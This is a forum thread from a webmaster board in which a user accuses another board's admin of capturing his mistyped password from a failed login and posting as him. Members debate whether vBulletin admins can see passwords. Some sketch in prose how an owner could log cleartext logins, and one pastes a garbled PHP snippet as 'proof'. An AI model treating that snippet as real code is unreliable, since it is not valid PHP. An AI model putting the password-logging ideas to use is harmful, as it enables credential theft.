OTHER BOARDS STEALING PASSWORDS: (read important)
 

There is a board out there VERY similar to this i am not going to mention names until i am 100% sure. lets say VERY VERY similar.

i tried to log in accidentally using my GFY password. the mod or admin from that board then proceeded to use my password to log into my GFY account and post as me.

i guess it is their policy to steal their users passwords and post as them.

i want to give you people the heads up and make sure you do not make the same mistake i did.

i emailed eric to see if he can match any IPs i will let you know what comes of it.

it would be pretty LOW of them to do such thing :2 cents:

Yes it would.

However, I can think of a few boards that could have done it.

Mental note to self, change all passwords.

jez that is sick

yep. some people dont like me i understand that. i try to make people laugh and joke around but some people take boards very seriously.

i dish it and take it.

i would never go out of my way to actually harm someone that is not my style.

i know it is them because that is the only other place i have typed that password. i got an error message of 1 out of 5 tries. thus i know that vbulletin stores the log in attempts. so it was a mod from over there.

not to mention posters from this board were saying a nickname on their was a fake nic of mine. i have no need to use a fake nic i am always upfront. i have no need to hide. i guess they are cowards and do.

yep i never even thought of it before i am pretty good at keeping my passwords separate but i slipped up. i guess thats the way these people conduct business. you go to check out their board and they end up using your password against you.

i had to go through and change 10 log ins just incase.

----

i am waiting for eric to respond i already know who it is but i dont want to point fingers until i have 100% proof.

Goddamn Motherfuckers, Please post when you get proof. I am on too many other boards. And that would pretty much fucking blow. And if you get the IP, they are already fucked.

Eric should have the IP i only emailed 15min ago i know he is very busy so i am waiting patiently.

I am in DC now so lets see if these guys were even smart enough to use a different IP. i am guessing not.

i caught it within 2min of it happening. they already posted as me and i caught it and edited. Vbulletin tracks IP login attempts as far as i know.

watch your passwords. i literally never even thought of this. but i guess when you deal with scum you cant expect anything less.

parked sig. Keep us posted, please.

Yes Vbulletin does indeed track IP, if the Mod has it set as a "catch all" in his or her admin panel and redirects to his or hers database. It is clicked to "on" as a default.

I don't think this is possible.

GFY uses vbulletin (www.vbulletin.com). The passswords of its users are not visible in the administrator program. Administrators can change the passwords of users, but cannot see the actual passwords. Password attemps are also not stored.

I think you are safe. If VBulletin had this kind of vulnerability they wouldn't be so popular.

vb, phpbb, smf, every board is storing crypted password. owner of any board can not see your password, only its hash in sql db. if they want, they may use proggie to decrypt your hash, and if you have password 12345 its not that hard

yes please, when you get proof out these people. I want to make sure that I never do business with anyone that would do or allow that type of behavior


spaz

how about the owner of the board? i am sure there is a way for them to see your password. even so it was not from my pass on that board. it was from a failed login attempt.

is was not a 12345, it is a combo of letters that only someone who knew it would be able to use it. the chances of even brute forcing my GFY pass vbulletin has protection.

and my computer is not hacked. i bought it 4 days ago.

i know it was them. i logged in with wrong info lastnight on this board. it was not my stored password on there. it was a FAILED LOGIN ATTEMPT.

i tried 3-4 different passes. i am pretty sure vbulletin stores the failed attempts. including which ip address it was from.

i at least hope they kept ur sig intact when they impersonate you :) seriously some folks have too much idle time on their hands to dabble in stuff like that. i have 3 computers running ftp, videocharge, and premiere at the same time and even when i leave the house or sleep there is always something processing on one of them. it amazes me who has time for these games

i will let everyone know. i am waiting to see if the IP matches a GFY user.

they did not keep anything intact they changed my info. avatar, city and posted as me. i just happened to catch each within the same minute and changed it back.

if they were smart they would have changed my pass first but i guess they are to big of idiots for that.

it may be funny to them but imo if you go and post on another board and they steal your pass it shows what extreme scum they are. if they are willing to use something as trusted as a password it shows me they are capable of doing anything.

I'm pretty sure this is in fact the case. I don't think admins can see the passwords, just change them.
WG

i should have been more clear in the original post.

this was NOT my password on the site.

it was a failed login attempt. you get 5 log in attempts and i am pretty sure vbulletin stores each FAILED attempt.

look i am not a rookie i know it was them it is just whether or not i can prove it. if i cannot so be it. at least i have peace of mind knowing it was them.

where is the post that this dude made?
i`m curious how he made use of this, with what idea in mind he did this?

Lot of GFY users use a same postings name elsewhere and i am pretty pretty pretty sure a lot of passes are the same also.

http://www.gfy.com/16781575-post28.html

this was the post. i edited it out, i reloaded the page and my info was changed. so around a minute before that the post was made and i still had enough time to edit.

---------

just got an email from eric no ip matches found. not much i can do. i appreciate the response anyway. just be careful people is all i am saying. this has taught me a lesson to be careful with my passwords.

Jesus guys, really?
You can most certainly get plugins that integrate with vbulletin to do this and as security_man stated, it's really not that hard. Oh... you want examples? Well here ya go.

if (is_object($vbulletin->session) AND intval($vbulletin->session->vars['loggedin']) == 2)
{
exec_strike_user($vbulletin->userinfo['username']);

if ($vbulletin->options['usestrikesystem'])
{
eval(standard_error(fetch_error('multiplelogin_str ikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
}
else
{
eval(standard_error(fetch_error('multiplelogin', $vbulletin->options['bburl'], $vbulletin->session->vars>PASSWORD?=SEND TO CATCH-ALL['sessionurl'])));

ALSO right there on vbulletin.org, is the BIG SCREAMING HEADLINE
Track all IP Addresses, and User Nick and Password via Admin CP

...fucking "google" it people!!!

:) where there is a will there is a way.

maybe when im really pissed off oneday i will call them out and get banned for no proof. we will see how the cookie crumbles.

i have to much work to worry to much about it.

appreciate the help. :thumbsup

i 100% know who it is now.

i don't think so, there is no password reminder, if youforget your password you only have an option to reset it to another one, not get the old one you forgot

Just a FYI for everyone, and I'm not trying to be a know it all after the fact MetaMan,

but it is not a good idea to use the same password anywhere on any site for anything

every password you have should be very very unique

I thought you had a bit of coding background Mark?
Seriously, stealing the passwords is a total fucking doddle.

#1 - They're probably not running a copy of VB - simple passing the login / password onto gfy.com - and saving a copy as it goes

#2 - Even if they were - VB is clear source. Nothing stopping you making it save passes in an open format.

#3 - Even if it WASN'T clear source, you could probably acheive the same with db triggers.

'I think you are safe'.. lol

totally agreed. that is why i made this thread. alot of people forget but it is a big thing.

but my pass was different i just accidentally typed my GFY one in. and so it gets picked up as a failed attempt.

it is possible for the web owner to steal passwords with vbulletin. basically you'd just have to just disable the client side hashing and write up a little script that logs the info as it's coming across as clear text.

:1orglaugh:1orglaugh:1orglaugh:1orglaugh:1orglaugh Thanks for the spot on.

It was my board and this is total bullshit.

I have to hire guys like quantum-x, WOJ and k0nrad to do any sort of code work for me because that is not what I do. If you think I'm over there trying to re-code VB to steal your password (we don't see passwords) from a failed log attempt, and risk doing business with people, all so I can log into GFY as "MetaMan," you're out of your god damned mind.

Quantum-x, I've let you into my program before as an admin and I trust you. You are more than welcome to look as an admin into the board and let this ass hat know what you find.

In the meantime, please... I'M BEGGING METAMAN, show me proof of this.

We have a few VB boards and have never seen anything that gave me a hint that there was some way to see users passwords. If they forget it they can use the password reminder or we can change it, but that is about it.

I never use the same passwords anywhere. Btw Was it WF forum? What do you mean by "VERY VERY similar" ?

So what did they post under your username before you edited it?

Hey - not casting any judgement on anyone, just saying that the conclusion that 'they run VB, it's secure' is a little naive :)

I didn't mean it like that, I mean I trust you, you've been in my program admin before, so I'm saying PLEASE look in my board admin and tell this fool he's on crack. You know what to look for.

Metaman is a moron and he has produced zero proof. He is fucking with someone else's business and that is just not cool.

yikes thats not good!

SSSSHHHH don't spoil this gem of a thread :1orglaugh

Well most likely your being totally honest and not doing H$ck Sh^t. I fucked around with it in college. I do hope you all get it resolved. And at least some VB_admins now know that shady characters could get inside the shell if they wanted too. Also one of the reasons I did not put the exact source code up. Good luck to you all. Good luck DirtyWhiteBoy. Perhaps things got muddled up and blown up? I would talk to Meta and compare notes. You may want to leave a message on his profile. Good luck regardless :thumbsup

check your style manager and templete tags, if there's a troll script, thats most likely where it would be, buried amidst the other code

why would anyone want to impersonate a troll?

they changed my entire user admin,

also posted an "apology" saying i was drunk.

i never said it was DWB. i love his board.

You get that IP from Eric? Get it, send it to me and lets see if it matches anything I have from my board. I also have an open invite to coders I trust to come in and look around to see if there is something malicious on the site.

As far as I know, you are the only one to have this problem, and I honestly don't believe it came from our site. If someone is catching passes there in any manner, they would be having a field day, which they are not.

Someone has a lot of time on their hands.

Hope it gets sorted.

i never said it comes from your site. i have no proof i am not that stupid.

eric told me the IP did not match. that already shows someone took the time to proxy a login.

i am telling you i logged in somewhere and other then GFY this is the only place i have ever tried to login using that pass. i am also on a brand new computer.

but hey i am full of shit here. even though i do not have a login on any other place but GFY and this other board.

i think this other board should check with their other admins and see who is friends with who and it will explain it pretty fast.

We have TWO admins. Mike South and myself. It's not a big board so we don't need an army of mods.

Why did only your account get hacked? If someone on my board is stealing passwords somehow, why only you, and why only today, and why go through all that trouble, even using a proxy, just to make a post under your name to fuck with you, and how did you catch it within a minute of them hacking your account? None of that makes sense man.

Get that IP to me. Both of them. Lets see if they match with anything on my board. Send it to me on the IM there.

i was not "hacked" vbulletin stores failed login attempts that is all there is to it. and that is exactly how my password was discovered and used.

if the anonymous parties involved did it as a joke with no malicious intent then so be it. but if you think i go out of my way to bring up a topic as serious as this you should think otherwise.

as i stated before my nickname for me is used as a brand. whether or not people like my style you can never find a single post out of all the haters in history since i have been here saying REAL negative things about me.

i dish it so i can take it. but i do know where to draw the line. if other people dont follow the same guidelines that is their choice. but to me it is no laughing matter. i have stated what i need to be stated and i have no need to beat a dead horse.

if you and mike want to discuss the situation that is fine by me. but think very hard what reasons i would have to start to drama with you and you should be quick to conclude i have none.

on GFY i have never even stated it was you so people should not take it that way. i am not going to ever point fingers on here unless i fully get proof.

in retrospect with having nothing to do with this situation please ban my nickname from your board as it serves no possitive purpose for either of us.

You realize TeenCat has been hacking accounts like crazy on here right? That is much more likely than your scenario. :2 cents:

It was probably Teencat just messing with you.

WG, I think you've been in this biz long enough that you should know that all you have to do modify the code to remove the hash and then look at the DB tables. tsk! tsk! :winkwink::winkwink::winkwink: